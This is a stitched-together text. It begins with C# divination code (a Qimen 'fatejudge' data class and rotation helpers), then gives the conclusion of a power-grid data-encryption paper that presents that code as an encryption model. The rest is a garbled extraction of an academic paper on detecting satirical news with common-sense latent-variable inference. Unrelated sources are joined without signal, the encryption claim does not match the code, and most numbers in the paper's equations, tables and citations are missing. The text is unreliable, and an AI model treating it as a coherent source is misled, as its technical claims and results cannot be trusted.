
    using System;
    using System.Collections.Generic;
    using System.Linq;
    using System.Text;

    namespace fatejudge.core.qm
    {
        public class QMData
        {
            // Initializer values are elided in the source text.
            public static int[] shunzhuan = new int[] { /* elided */ };
            public static int[] nizhuan = new int[] { /* elided */ };
            public static string[] jushu = new string[] { /* elided */ };
            public static string qyyw = "";                      // value elided
            public static string[] rpqm = new string[] { /* elided */ };
            public static string[] tianpanxingyuanwei = new string[] { };
            public static string[] spqm = new string[] { };
            public static string[] renpanxingzhuanxu = new string[] { };
            public static string[] tianpanxingzhuanxu = new string[] { };
            public static string[] shenpanzhuanxu = new string[] { };
        }
    }

Data rotation.

    public int getrpg(string yinyan, int zhishigong, string zhishi, string ren)
    {
        int ret = 0;
        // QMData.rpxzx is referenced here but its declaration is not included in the excerpt.
        int n1 = getstringarrayindex(QMData.rpxzx, ren);   // position of 'ren' in the rotation order
        int n2 = (getintarrayindex(QMData.shunzhuan, zhishigong) + n1)
                 % QMData.shunzhuan.Length;                // modulus elided in the source
        ret = QMData.shunzhuan[n2];
        return ret;
    }

    public int getintarrayindex(int[] sa, int n)
    {
        int ret = 0;
        for (int i = 0; i < sa.Length; i++)
        {
            if (sa[i].Equals(n)) { ret = i; break; }
        }
        return ret;
    }

    public string getpostrenpan(string zhishi, int zhishigong, int p)
    {
        string ret = string.Empty;
        // Offsets and moduli are elided in the source; array lengths are used as placeholders.
        int n1 = (getintarrayindex(QMData.shunzhuan, p)
                  - getintarrayindex(QMData.shunzhuan, zhishigong)
                  + QMData.shunzhuan.Length) % QMData.shunzhuan.Length;
        int n2 = getstringarrayindex(QMData.rpxzx, zhishi);
        int n3 = (n1 + n2) % QMData.rpxzx.Length;
        ret = QMData.rpxzx[n3];
        return ret;
    }

IV. Conclusion
Figure. Data encryption model
Power data is the lifeblood of a country's economy and people's livelihood. With the rapid development of the Internet of Things, the Internet and the ubiquitous power Internet of Things, the security of data connections is particularly important. Through the practice of the data encryption model above, the information source itself can be encrypted, which is different from the usual symmetric and asymmetric encryption algorithms.
this kind of model calculation can be encapsulated into ic or t card to form an encryption module, which is widely used in power inspection terminals, smart electricity meters and power big data cleaning applications, to increase the security means of data transmission, and to provide some enlightenment and reference for the data transmission encryption methods of power companies. international journal of advanced network, monitoring and controls volume , no. , reference [ ] song lei, luo qiliang, luo yi, tu guangyu. encryption scheme of real-time data communication in power system [j]. power system automation, ( ) [ ] liu gang, liang ye et al. realization and application of digital certificate technology in power secondary system [j]. power grid technology, , [ ] xingyuan wang,hongyu zhao,le feng,xiaolin ye,hao zhang. high-sensitivity image encryption algorithm with random diffusion based on dynamic-coupled map lattices[j]. optics and lasers in engineering, , . [ ] chen changqing. research on computer network communication intrusion prevention method based on data encryption technology [j]. information and computer (theoretical edition), ( ): - . [ ] doe/oak ridge national laboratory; ornl to take on nine power grid modernization projects as part of doe award[j]. newsrx health & science, . [ ] chen zhiguang. analysis and design of power project management system of state grid fuzhou power supply company [d]. yunnan university, . understanding satirical articles using common-sense dan goldwasser purdue university department of computer science dgoldwas@purdue.edu xiao zhang purdue university department of computer science zhang @purdue.edu abstract automatic satire detection is a subtle text clas- sification task, for machines and at times, even for humans. in this paper we argue that satire detection should be approached using common-sense inferences, rather than tradi- tional text classification methods. we present a highly structured latent variable model cap- turing the required inferences. the model ab- stracts over the specific entities appearing in the articles, grouping them into generalized categories, thus allowing the model to adapt to previously unseen situations. introduction satire is a writing technique for passing criticism using humor, irony or exaggeration. it is often used in contemporary politics to ridicule individual politicians, political parties or society as a whole. we restrict ourselves in this paper to such politi- cal satire articles, broadly defined as articles whose purpose is not to report real events, but rather to mock their subject matter. satirical writing often builds on real facts and expectations, pushed to ab- surdity to express humorous insights about the situ- ation. as a result, the difference between real and satirical articles can be subtle and often confusing to readers. with the recent rise of social media outlets, satirical articles have become increasingly popular and have famously fooled several leading news agencies . these misinterpretations can often https://newrepublic.com/article/ / satire-news-websites-are-cashing-gullible- outraged-readers vice president joe biden suddenly barged in, asking if anyone could “hook [him] up with a dixie cup” of their urine. “c’mon, you gotta help me get some clean whiz. shinseki, donovan, i’m looking in your direction” said biden. “do you want to hit this?” a man asked president barack obama in a bar in denver tuesday night. the president laughed but didn’t indulge. 
it wasn’t the only time obama was offered weed on his night out. figure : examples of real and satirical articles. top: satirical news excerpt. bottom: real news excerpt. be attributed to careless reading, as there is a clear line between unusual events finding their way to the news and satire, which intentionally places key po- litical figures in unlikely humorous scenarios. the two can be separated by carefully reading the arti- cles, exposing the satirical nature of the events de- scribed in such articles. in this paper we follow this intuition. we look into the satire detection task (burfoot and bald- win, ), predicting if a given news article is real or satirical, and suggest that this prediction task should be defined over common-sense inferences, rather than looking at it as a lexical text classifica- tion task (pang and lee, ; burfoot and bald- win, ), which bases the decision on word-level features. to further motivate this observation, consider the two excerpts in figure . both excerpts mention top-ranking politicians (the president and vice pres- ident) in a drug-related context, and contain infor- mal slang utterances, inappropriate for the subjects’ transactions of the association for computational linguistics, vol. , pp. – , . action editor: timothy baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. position. the difference between the two examples is apparent when analyzing the situation described in the two articles: the first example (top), de- scribes the vice president speaking inappropriately in a work setting, clearly an unrealistic situation. in the second (bottom) the president is spoken to inap- propriately, an unlikely, yet not unrealistic, situation. from the perspective of our prediction task, it is ad- visable to base the prediction on a structured repre- sentation capturing the events and their participants, described in the text. the absurdity of the situation described in satir- ical articles is often not unique to the specific in- dividuals appearing in the narrative. in our exam- ple, both politicians are interchangeable: placing the president in the situation described in the first ex- cerpt would not make it less absurd. it is therefore desirable to make a common-sense inference about high-ranking politicians in this scenario. we follow these intuitions and suggest a novel approach for the satire prediction task. our model, comsense, makes predictions by making common-sense inferences over a simplified narra- tive representation. similarly to prior work (cham- bers and jurafsky, ; goyal et al., ; wang and mcallester, ) we represent the narrative structure by capturing the main entities (and tracking their mentions throughout the text), their activities, and their utterances. the result of this process is a narrative representation graph (nrg). figure de- picts examples of this representation for the excerpts in figure . given an nrg, our model makes inferences quantifying how likely are each of the represented events and interactions to appear in a real, or satiri- cal context. annotating the nrg for such inferences is a challenging task, as the space of possible situa- tions is extremely large. instead, we frame the re- quired inferences as a highly-structured latent vari- able model, trained discriminatively as part of the prediction task. 
without explicit supervision, the model assigns categories to the nrg vertices (for example, by grouping politicians into a single cate- gory, or by grouping inappropriate slang utterances, regardless of specific word choice). these category assignments form the infrastructure for higher-level reasoning, as they allows the model to identify the commonalities between unrelated people, their ac- tions and their words. the model learns common- sense patterns leading to real or satirical decisions based on these categories. we express these pat- terns as parametrized rules (acting as global fea- tures in the prediction model), and base the predic- tion on their activation values. in our example, these rules can capture the combination of (epolitician) ∧ (qslang)→ satire, where epolitician and qslang are latent variable assignments to entity and utterance categories respectively. our experiments look into two variants of satire prediction: using full articles, and the more chal- lenging sub-task of predicting if a quote is real given its speaker. we use two datasets collected years apart. the first collected in (burfoot and bald- win, ) and an additional dataset collected re- cently. since satirical articles tend to focus on cur- rent events, the two datasets describe different peo- ple and world events. to demonstrate the robust- ness of our comsense approach we use the first dataset for training, and the second as out-of-domain test data. we compare comsense to several com- peting systems including a state-of-the-art convo- lutional neural network (kim, ). our experi- ments show that comsense outperforms all other models. most interestingly, it does so with a larger margin when tested over the out-of-domain dataset, demonstrating that it is more resistant to overfitting compared to other models. related work the problem of building computational models deal- ing with humor, satire, irony and sarcasm has at- tracted considerable interest in the the natural lan- guage processing (nlp) and machine learning (ml) communities in recent years (wallace et al., ; riloff et al., ; wallace et al., ; davi- dov et al., ; karoui et al., ; burfoot and baldwin, ; tepperman et al., ; gonzález- ibánez et al., ; lukin and walker, ; fi- latova, ; reyes et al., ). most work has looked into ironic expressions in shorter texts, such as tweets and forum comments. most related to our work is burfoot and baldwin ( ) which focused on satirical articles. in that work the authors sug- gest a text classification approach for satire detec- tion. in addition to using bag-of-words features, the authors also experiment with semantic validity fea- tures which pair entities mentioned in the article, thus capturing combinations unlikely to appear in a real context. this paper follows a similar intuition; however, it looks into structured representations of this information, and studies their advantages. our structured representation is related to several recent reading comprehension tasks (richardson et al., ; berant et al., ) and work on narrative representation such, as event-chains (chambers and jurafsky, ; chambers and jurafsky, ), plot- units (goyal et al., ; lehnert, ) and story intention graphs (elson, ). 
unlike these works, narrative representation is not the focus of this work, but rather provides the basis for making inferences, and as result we choose a simpler (and more ro- bust) representation, most closely resembling event chains (chambers and jurafsky, ) making common-sense inferences is one of the core missions of ai, applicable to a wide range of tasks. early work (reiter, ; mccarthy, ; hobbs et al., ) focused on logical inference, and manual construction of such knowledge repos- itories (lenat, ; liu and singh, ). more recently, several researchers have looked into au- tomatic common-sense knowledge construction and expansion using common-sense inferences (tandon et al., ; bordes et al., ; socher et al., ; angeli and manning, ). several works have looked into combining nlp with common- sense (gerber et al., ; gordon et al., ; lobue and yates, ; labutov and lipson, ; gordon et al., ). most relevant to our work is a semeval- task (gordon et al., ), looking into common-sense causality identification predic- tion. in this work we focus on a different task, satire detection in news articles. we argue that this task is inherently a common-sense reasoning task, as iden- tifying the satirical aspects in narrative text does not require any specialized training, but instead relies heavily on common expectations of normative be- havior and deviation from it in satirical text. we design our model to capture these behavioral expec- tations using (weighted) rules, instead of relying on lexical features as is often the case in text categoriza- tion tasks. other common-sense frameworks typi- cally build on existing knowledge bases represent- ?c?mon, you got t a hel p me get some cl ean whiz- shinseki, donovan, i ?m l ooking in your dir ect ion" mnr ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es bar ge suddenl y quote ask vice pr esident joe biden (a) nrg for a satirical article tmpquote ask a man "do you want t o hit t his?" tuesday night bar in denver did not pr esident bar ack obama the pr esident coref ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es loc laugh a a a i ndul ge a neg (b) nrg for a real article figure : narrative representation graph (nrg) for two article snippets ing world knowledge; however, specifying in ad- vance the behaviors commonly associated with peo- ple based on their background and situational con- text, to the extent it can provide good coverage for our task, requires considerable effort. instead, we suggest to learn this information from data directly, and our model learns jointly to predict and represent the satirical elements of the article. modeling given a news article, our comsense system first constructs a graph-based representation of the narrative, denoted narrative representation graph (nrg), capturing its participants, their actions and utterances. we describe this process in more de- tail in section . . based on the nrg, our model makes a set of inferences, mapping the nrg ver- tices to general categories abstracting over the spe- cific nrg. these abstractions are formulated as la- tent variables in our model. the system makes a prediction by reasoning over the abstract nrg, by decomposing it into paths, where each path captures a partial view of the abstract nrg. finally we asso- ciate the paths with the satire decision output. 
the comsense model then solves a global inference problem, formulated as an integer linear program (ilp) instance, looking for the most likely explana- tion of the satire prediction output, consistent with the extracted patterns. we explain this process in detail in section . . nrg abstraction as common-sense the main goal of the comsense approach is to move away from purely lexical models, and instead base its de- cisions on common-sense inferences. we formulate these inferences as parameterized rules, mapping el- ements of the narrative, represented using the nrg, to a classification decision. the rules’ ability to cap- ture common-sense inferences hinges on two key el- ements. first, the abstraction of nrg nodes into typed narrative elements allows the model to find commonalities across entities and their actions. this is done by associating each nrg node with a set of latent variables. second, constructing the decision rules according to the structure of the nrg graph allows us to model the dependencies between narra- tive elements. this is done by following the paths in the abstract nrg, generating rules by combining the latent variables representing nodes on the path, and associating them with a satire decision variable. computational considerations when setting up the learning system, there is a clear expressiv- ity/efficiency tradeoff over these two elements. in- creasing the number of latent variables associated with each nrg node would allow the model to learn a more nuanced representation. similarly, gener- ating rules by following longer nrg paths would allow the model to condition its satire decision on multiple entities and events jointly. the added expressivity does not come without price. given the limited supervision afforded to the model when learning these rules, additional expressivity would result in a more difficult learning problem which could lead to overfitting. our experiments demon- strate this tradeoff, and in figure we show the ef- fect of increasing the number of latent variables on performance. an additional concern with increas- ing the model’s expressivity is computational effi- ciency. satire prediction is formulated as an ilp inference process jointly assigning values to the la- tent variables and making the satire decision. since ilp is exponential in the number of variables, in- creasing the number of latent variables would be computationally challenging. in this paper we take a straight-forward approach to ensuring computa- tional tractability by limiting the length of nrg paths considered by our model to a constant size c= . assuming that we have m latent categories as- sociated with each node, each path would generate mc ilp variables (see section . for details), hence the importance of limiting the length of the path. in the future we intend to study approximate inference methods that can help alleviate this computational difficultly, such as using lp-approximation (martins et al., ). . narrative representation graph for news articles the narrative representation graph (nrg) is a sim- ple graph-based representation for narrative text, de- scribing the connections between entities and their actions. the key motivation behind nrg was to pro- vide the structure necessary for making inferences, and as a result we chose a simple representation that does not take into account cross-event relationships, and nuanced differences between some of the event argument types. 
while other representations (mani, ; goyal et al., ; elson, ) capture more information, they are harder to construct and more prone to error. we will look into adapting these models for our purpose in future work. since satirical articles tend to focus on political figures, we design the nrg around animate entities that drive the events described in the text, their ac- tions (represented as predicate nodes), their contex- tualizing information (location-modifiers, temporal modifiers, negations), and their utterances. we omit- ted from the graph other non-animate entity types. in figure we show an example of this representa- tion. similar in spirit to previous work (goyal et al., ; chambers and jurafsky, ), we represent the relations between the entities that appear in the story using a semantic role labeling system (pun- yakanok et al., ) and collapse all the entity men- tions into a single entity using a co-reference reso- lution system (manning et al., ). we attribute utterances to their speaker based on a previously published rule based system (o’keefe et al., ). formally, we construct a graph g = {v,e}, where v consists of three types of vertices: an- imate entity (e.g., people), predicate (e.g., actions) and argument (e.g., utterances, loca- tions). the edges e capture the relationships be- tween vertices. the graph contains several different edges. coref edges collapse the mentions of the same entity into a single entity, argument-type edges connect animate entity nodes to pred- icate nodes , and predicate nodes to argument nodes (modifiers). finally we add quote edges connecting animate entity nodes to utterances (argument). . satire prediction using the narrative representation graph satire prediction is inherently a text classification problem. such problems are often approached us- ing a bag-of-words (bow) model which ignores the document structure when making predictions. in- stead, the nrg provides a structured representation for making the satire prediction. we begin by show- ing how the nrg can be used directly and then dis- cuss how to enhance it by mapping the graph into abstract categories. directly using nrg for satire prediction we suggest a simple approach for extracting features di- rectly from the nrg, by decomposing it into graph paths, without mapping the graph into abstract cat- egories. this simple, word-based representation for prediction structured according to the nrg (denoted narrlex), generates features by using the words in the original document, corresponding to the graph decomposition. for example, consider the path con- necting “a man” to an utterance in figure (b). sim- ple features could associate the utterances words with that entity, rather than with the president. the resulting narrlex model generates bag-of-words features based on words corresponding to nrg path vertices, conditioned on their connected entity ver- tex. using common-sense for satire prediction un- like the narrlex model, which relies on directly these edges are typed according to their semantic roles. observed information, our comsense model per- forms inference over higher level patterns. in this model the prediction is a global inference process, taking into account the relationships between nrg elements (and their abstraction into categories) and the final prediction. this process is described in fig- ure . first, the model associates a high level category, that can be reused even when other, previously un- seen, entities are discussed in the text. 
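To make the graph construction and the path-based feature extraction concrete, here is a minimal sketch with a tiny hand-built graph standing in for the SRL, coreference, and quote-attribution pipeline the authors use. The vertex and edge types follow the text (entity, predicate, argument; argument and quote edges); everything else, including the helper names, is illustrative.

from dataclasses import dataclass, field
from typing import Dict, List, Tuple

@dataclass
class Vertex:
    vid: int
    vtype: str          # "entity", "predicate", or "argument"
    text: str

@dataclass
class NRG:
    vertices: Dict[int, Vertex] = field(default_factory=dict)
    edges: List[Tuple[int, int, str]] = field(default_factory=list)  # (src, dst, edge type)

    def add_vertex(self, vid, vtype, text):
        self.vertices[vid] = Vertex(vid, vtype, text)

    def add_edge(self, src, dst, etype):
        self.edges.append((src, dst, etype))

    def paths(self, max_len: int = 2):
        # Decompose the graph into paths of bounded length (here: single
        # vertices and connected vertex pairs), as described in the text.
        for v in self.vertices.values():
            yield (v,)
        if max_len >= 2:
            for src, dst, _ in self.edges:
                yield (self.vertices[src], self.vertices[dst])

def narrlex_features(graph: NRG) -> List[str]:
    # narrlex-style features: the words of a path vertex, conditioned on the
    # entity vertex it is connected to.
    feats = []
    for path in graph.paths(max_len=2):
        if len(path) == 2 and path[0].vtype == "entity":
            for word in path[1].text.lower().split():
                feats.append(f"{path[0].text}|{word}")
    return feats

# A toy NRG for the real-news excerpt in Figure 1.
g = NRG()
g.add_vertex(0, "entity", "a man")
g.add_vertex(1, "predicate", "ask")
g.add_vertex(2, "argument", "do you want to hit this?")
g.add_edge(0, 1, "argument")
g.add_edge(0, 2, "quote")
print(narrlex_features(g))

The printed features associate the utterance words with "a man" rather than with the president, which is exactly the conditioning the narrlex baseline relies on.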
we associate a set of boolean variables with each nrg vertex, capturing higher level abstraction over this node. we define three types of categories correspond- ing to the three types of vertices, and denote them e,a,q for entity category, action category and quote category, respectively. each category vari- able can take k different values. as a convention we denote x = i as category assignment, where x ∈ {e,a,q} is the category type, and i is its as- signment. since these category assignments are not directly observed, they are treated as latent variables in our model. this process is exemplified at the top right corner of figure . combinations of category assignments form pat- terns used for determining the prediction. these pat- terns can be viewed as parameterized rules. each weighted rule associates a combination with an out- put variable (satire or real). examples of such rules are provided in the middle of the right corner of figure . we formulate the activations of these rules as boolean variables, whose assignments are highly interconnected. for example, the variables representing the following rules (e = )→ satire and (e = )→ real are mutually exclusive, since assigning a t value to either one entails a satire (or real) prediction. to account for this interdepen- dency, we add constraints capturing the relations be- tween rules. the model makes predictions by combining the rule weights and predicting the top scoring output value. the prediction can be viewed as a derivation process, mapping article entities to categories (e.g., entity(“a man”)→ (e= ), is an example of such derivation), combinations of categories compose into prediction patterns (e.g., (e= )→satire). we use an ilp solver to find the optimal derivation se- quence. we describe the inference process as an in- teger linear program in the following section. "do you want t o hit t his?" quote a a man pr esident bar ak obama laugh ar gument s and modi f i er s pr edi c at es ani mat e ent i t i es e= q= a= e= commonsense pr edict ion rules lat ent cat egor y assignment s entity("a man") (e= ) entity("president barak obama") (e= ) predicate("laugh") (a= ) quote("do you want to hit this?") (q= ) (e= ) satire (e= ) satire (a= ) satire (q= ) satire (e= ) (a= ) satire (e= ) (q= ) satire (e= ) real (e= ) real (a= ) real (q= ) real (e= ) (a= ) real (e= ) (q= ) real figure : extracting common-sense prediction rules. . identifying relevant interactions using constrained optimization we formulate the decision as a - integer linear programming problem, consisting of three types of boolean variables: category assignments indicator variables, indicator variables for common-sense pat- terns, and finally the output decision variables. each indicator variable is also represented using a feature set, used to score its activation. . . category assignment variables each node in the nrg is assigned a set of com- peting variables, mapping the node to different cate- gories according to its type. • animate entity category variables, de- noted hi,j,e, indicating the entity category i for nrg vertex j. • action category variables, denoted hi,j,a, in- dicating the action category i for nrg vertex j. • quote category variables, denoted hi,j,q, in- dicating the quote category i for nrg vertex j. the number of possible categories for each vari- able type is a hyper-parameter of the model. variable activation constraints category as- signments to the same node are mutually exclusive (a node can only have a single category). 
we encode this fact by constraining the decision with a linear constraint (where x ∈{e,a,q}): ∀j ∑ i hi,j,x = . category assignment features each deci- sion variable decomposes into a set of features, φ(x,hi,j,x ) capturing the words associated with the j-th vertex, conditioned on x and i. . . common-sense patterns variables we represent common-sense prediction rules us- ing an additional set of boolean variables, connect- ing the category assignments variables with the out- put prediction. the space of possible variables is determined by decomposing the nrg into paths of size up to , and associating two boolean variables with category assignment variables corresponding to the vertices on these paths. one of the variables as- sociates the sequence of category assignment vari- ables with a real output value, and one with a satire output value. • single vertex path patterns variables, denoted by hbhi,j,x , indicating that the category assignment captured by hi,j,x is associated with output value b (where b∈{satire, real}). • two vertex path patterns variables, denoted by hb (hi,j,x ),(hk,l,x ) , indicating that the pattern cap- tured by category assignment along the nrg path of hi,j,x and hi,j,x is associated with output value b (where b∈{satire, real}). decision consistency constraints it is clear that the activation of the common-sense patterns vari- ables entails the activation of the category assign- ment variables, corresponding to the elements of the common-sense patterns. for readability we only write the constraint for the single vertex path vari- ables: (hbhi,j,x ) =⇒ (hi,j,x ). features similar to the category assignment variable features, each decision variable decom- poses into a set of features, φ(x,hbhi,j,x ). these fea- tures captures the words associated with each of the category assignment variables (in this example, the words associated with the j-th vertex) conditioned on the category assignments and the output predic- tion value (in this example, x, i and b). we also add a feature φ(hi,j,x,b) capturing the connection be- tween the output value b, and category assignment. . . satire prediction variables finally, we add two more boolean variables cor- responding to the output prediction: hsatire and hreal. the activation of these two variables is mu- tually exclusive, we encode that by adding the con- straint: hsatire + hreal = . we ensure the consistency of our model adding constraints forcing agreement between the final pre- diction variables, and the common-sense patterns variables: hbhi,j,x =⇒ h b. overall optimization function the boolean variables described in the previous section define a space of competing inferences. we find the optimal output value derivation by finding the optimal set of variables assignments, by solving the following objective: max y,h ∑ i hiw t φ(x,hi,y) s.t. c, ∀i; hi ∈{ , }, ( ) where hi ∈ h is the set of all variables defined above and c is the set of constraints defined over the activation of these variables. w is the weight vector, used to quantify the feature representation of each h, obtained using a feature function φ(·). note that the boolean variable acts as a - indi- cator variable. we formalize eq. ( ) as an ilp in- stance, which we solve using the highly optimized gurobi toolkit . http://www.gurobi.com/ parameter estimation for comsense the comsense approach models the decision as interactions between high-level categories of enti- ties, actions and utterances. 
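Before the discussion of parameter estimation, the joint inference just formulated can be illustrated at miniature scale. The sketch below replaces the Gurobi ILP with brute-force enumeration over a single entity-quote path, purely to show how category assignments, pattern variables, and the output decision are scored together under the mutual-exclusivity and consistency constraints; the number of categories and all weights are invented for illustration.

import itertools

K = 2                       # latent categories per vertex type (a hyper-parameter)
OUTPUTS = ("satire", "real")

# Hypothetical weights: w[(e_cat, q_cat, output)] scores the pattern
# (E = e_cat) AND (Q = q_cat) -> output for one entity-quote path.
w = {
    (0, 0, "satire"): 1.5, (0, 0, "real"): -0.5,
    (0, 1, "satire"): 0.2, (0, 1, "real"): 0.4,
    (1, 0, "satire"): -0.3, (1, 0, "real"): 0.9,
    (1, 1, "satire"): 0.1, (1, 1, "real"): 0.6,
}

best = None
for e_cat, q_cat, y in itertools.product(range(K), range(K), OUTPUTS):
    # Every enumerated assignment satisfies the constraints by construction:
    # exactly one category per vertex, exactly one output value, and the
    # active pattern variable agrees with both the categories and the output.
    score = w[(e_cat, q_cat, y)]
    if best is None or score > best[0]:
        best = (score, e_cat, q_cat, y)

score, e_cat, q_cat, y = best
print(f"prediction={y}  (E={e_cat}, Q={q_cat}, score={score})")

With many vertices, longer paths, and feature-based scores, the same search becomes the 0-1 integer program solved with Gurobi in the full model; the toy version only makes the shape of the derivation visible.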
however, the high level categories assigned to the nrg vertices are not ob- served, and as a result we view it as a weakly super- vised learning problem, where the category assign- ments correspond to latent variable assignments. we learn the parameters of these assignments by using a discriminative latent structure learning framework. the training data is a collection d ={(xi,yi)}ni= , where xi is an article, parsed into an nrg representation, and y is a binary label, indicating if the article is satirical or real. given this data we estimate the models’ parame- ters by minimizing the following objective function. ld(w) = min w λ ||w|| + n n∑ i= ξi ( ) ξi is the slack variable, capturing the margin vio- lation penalty for a given training example, and de- fined as follows: ξi = max y,h f(x,h,y,w) + cost(y,yi) − max h f(x,h,yi,w), where f(·) is a scoring function, similar to the one used in eq. . the cost function is the margin that the true prediction must exceed over the competing label, and it is simply defined as the difference be- tween the model prediction and the gold label. this formulation is an extension of the hinge loss for la- tent structure svm. λ is the regularization parame- ter controlling the tradeoff between the l regularizer and the slack penalty. we optimize this objective using the stochastic sub-gradient descent algorithm (ratliff et al., ; felzenszwalb et al., ). we can compute the sub- gradient as follows: ∇ld(w) = λw + n∑ i= Φ(xi,yi,y ∗) Φ(xi,yi,y ∗) = φ(xi,h ∗,yi) −φ(xi,h∗,y∗), where φ(xi,h∗,y∗) is the set of features represent- ing the solution obtained after solving eq. and modified to accommodate the margin constraint making a prediction. φ(xi,h∗,yi) is the set of fea- tures representing the solution obtained by solving eq. while fixing the outcome of the inference pro- cess to the correct prediction (i.e., yi). intuitively, it can be considered as finding the best explanation for the correct label using the latent variables h. in the stochastic version of the sub gradient de- scent algorithm we approximate ∇ld(w) by com- puting the sub gradient of a single example and mak- ing a local update. this version resembles the latent- structure perceptron algorithm (sun et al., ). we repeatedly iterate over the training examples and for each example, if the current w leads to a correct prediction (and satisfies the margin constraint), we only shrink w according to λ. if the model makes an incorrect prediction, the model is updated according Φ(xi,yi,y ∗). the optimization objective ld(w) is not convex, and the optimization procedure is guar- anteed to converge to a local minimum. empirical study we design our experimental evaluation to help clar- ify several questions. first, we want to understand how our model compares with traditional text classi- fication models. we hypothesize that these methods are more susceptible to overfitting, and design our experiments accordingly. we compare the models’ performance when using in-domain data (test and training data are from the same source), and out-of- domain data, where the test data is collected from a different source. we look into two tasks. one is the satire detection task (burfoot and baldwin, ). we also introduce a new task, called “did i say that?” which only focuses on utterances and speakers. the second aspect of our evaluation focuses on the common-sense inferences learned by our model. we examine how the size of the set of categories impacts the model performance. 
we also provide a qualitative analysis of the learned categories us- ing a heat map, capturing the activation strength of learned inferences over the training data. prediction tasks we look into two prediction tasks: ( ) satire detection (denoted sd), a binary classification task, in which the model has access to the complete article ( ) “did i say that?” (denoted dist), a binary classification task, consisting only of entities mentions (and their surrounding context in text) and direct quotes. the goal of the dist is to predict if a given utterance is likely to be real, given its speaker. since not all document contain di- rect quotes, we only use a subset of the documents in the sd task. datasets in both prediction tasks we look into two settings: ( ) in-domain prediction: where the training and test data are collected from the same source, and ( ) out-of-domain prediction, where the test data is collected from a different source. we use the data collected by burfoot and baldwin ( ) for training the model in both settings, and its test data for in-domain prediction (denoted train - sd’ , test - sd’ , train - sd’ - dist, test - sd’ - dist, respectively for training and testing in the sd and dist tasks). in addition, we collected a second dataset of satirical and real articles (de- noted sd’ ). this collection of articles contains real articles from cnn.com and satirical articles from theonion.com, a well known satirical news website. the articles were published between to , appearing in the political sections of both news web- sites. following other work in the field, all datasets are highly skewed toward the negative class (real ar- ticles), as it better characterizes a realistic prediction scenario. the statistics of the datasets are summa- rized in table . evaluated systems we compare several systems, as follows: system allpos always predict satire bb’ results by (burfoot and baldwin, ) conv convolutional nn. we followed (kim, ), using pre-trained -dimensional word vectors (mikolov et al., ). lex svm with unigram (lexu ) or both uni- gram and bigram (lexu+b ) features narrlex svm with direct nrg-based features (see sec . ) comsense our model. we denote the full model as comsensef , and comsenseq when us- ing only the entity+quotes based patterns. we tuned all the models’ hyper-parameters by us- ing a small validation set, consisting of % of the training data. after setting the hyper-parameters, the model was retrained using the entire dataset. we used svm-light to train our lexical baseline sys- tems (lex and narrlex). since the data is highly skewed towards the negative class (real), we ad- just the learner objective function cost factor for pos- itive examples to outweigh negative examples. the cost factor was tuned using the validation set. . experimental results since our goal is to identify satirical articles, given significantly more real articles, we report the f- measure of the positive class. the results are sum- marized in tables and . we can see that in all cases the comsense model obtains the best results. we note that in both tasks, when learning in the out- of-domain settings performance drops sharply, how- ever the gap between the comsense model and other models increases in these settings, showing that it is less prone to overfitting. interestingly, for the satire detection (sd) task, the comsenseq model performs best for the in- domain setting, and comsensef gives the best per- formance in the out-of-domain settings. 
we hypoth- esize that this is due to a phenomenon we call “over- fitting to document structure”. lexical models tend to base the decision on word choices specific to the training data, and as a result when tested on out of domain data, which describes new events and enti- ties, performance drops sharply. instead, the com- senseq model focuses on properties of quotations and entities appearing in the text. in the sd’ datasets, this information helps focus the learner, as the real and satire articles are structured differ- ently (for example, satire articles frequently contain multiple quotes). this structure is not maintained when working with out-of-domain data, and indeed in these settings the model benefits from using addi- tional information offered by the full model. number of latent categories our com- sense model is parametrized with the number of latent categories it considers for each entity, predicate and quote. this hyper-parameter can have a strong influence on the model performance (and running time). increasing it adds to the model’s expressivity allowing it to learn more complex patterns, but also defines a more complex learning http://svmlight.joachims.org/ . . . . . . ev= ev= ev= ev= ev= ev= lexlex quote vars f - s co re figure : different number of latent categories. ev de- notes the number entity categories used, and quotevars denotes the number of quote categories used. problem (recall our non-convex learning objective function). we focused on the dist task when evaluating different configurations as it converged much faster than the full model. figure plots the model behavior when using different numbers of latent categories. interestingly, the number of entity categories saturates faster than the number of quote categories. this can be attributed to the limited text describing entities. visualizing latent comsense patterns given the assignment to latent categories, our model learns common-sense patterns for identifying satirical and real articles based on these categories. ideally, these patterns could be extracted directly from the data, however providing the resources for this additional prediction task is not straightforward. instead, we view the category assignment as latent variables, which raises the question - what are the categories learned by the model? in this section we provide a qualitative evaluation of these categories and the prediction rules identified by the system using the heat map in figure . for simplicity, we focus on the dist task, which only has categories corresponding to entities and quotes. (a) prediction rules these patterns are expressed as rules, mapping category assignments to output values. in the dist task, we consider combinations of entity and quote category pairs, denoted ei,qj, in the heat map. the top part of figure , in red, shows the activation strength of each of the category com- task: sd indomain (sd’ +sd’ ) outdomain (sd’ +sd’ ) p r f p r f allpos . . . . bb’ . . . - - - conv . . . . . . lexu . . . . . . lexu+b . . . . . . narrlex . . . . . . comsenseq . . . . . . comsensef . . . . . . 
table : results for the sd task e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q e , q satire rule rule real activation activation quote topics activation entity topics activation satire profanity president real satire drugs liberal real satire polite conserva- real tive satire science annony- real mous satire legal politics real satire politics speaker real satire contro- law enfo- real versy rcement figure : visualization of the categories learned by the models. color coding capture the activation strength of manually constructed topical word groups, according to each latent category. darker colors indicate higher values. ei (qi), indicates an entity (quote) variable assigned the i-th category. data real satire train - sd’ test - sd’ test - sd’ train - sd’ - dist test - sd’ - dist test - sd’ - dist table : datasets statistics. binations when making predictions over the train- ing data. darker colors correspond to larger values, which were computed as: cell(ce,cq,b) = ∑ j hb (hce,j,e),(hcq,j,q) ∑ j,k,l hb (hk,j,e),(hl,j,q) intuitively, each cell value in figure is the number of times each category pattern appeared in real or satire output predictions, normalized by the over- all number of pattern activations for each output. we assume that different patterns will be associ- ated with satirical and real articles, and indeed we can see that most entities and quotes appearing in real articles fall into a distinctive category pattern, e ,q . interestingly, there is some overlap between the two predictions in the most active satire cate- gory (e ,q ). we hypothesize that this is due to the fact that the two article types have some overlap. (b) associating topic words with learned cate- gories in order to understand the entity and quote categories emerging from the training phase, we look at the activation strength of each category pat- tern with respect to a set of topic words. we manu- ally identified a set of entity types and quote topics, which are likely to appear in political articles. we associate a list of words with each one of these types. task: dist indomain (dist’ +dist’ ) outdomain (dist’ +dist’ ) p r f p r f allpos . . . . lexu . . . . . . comsenseq . . . . . . table : results for the dist task for example, the entity topic president was asso- ciated with 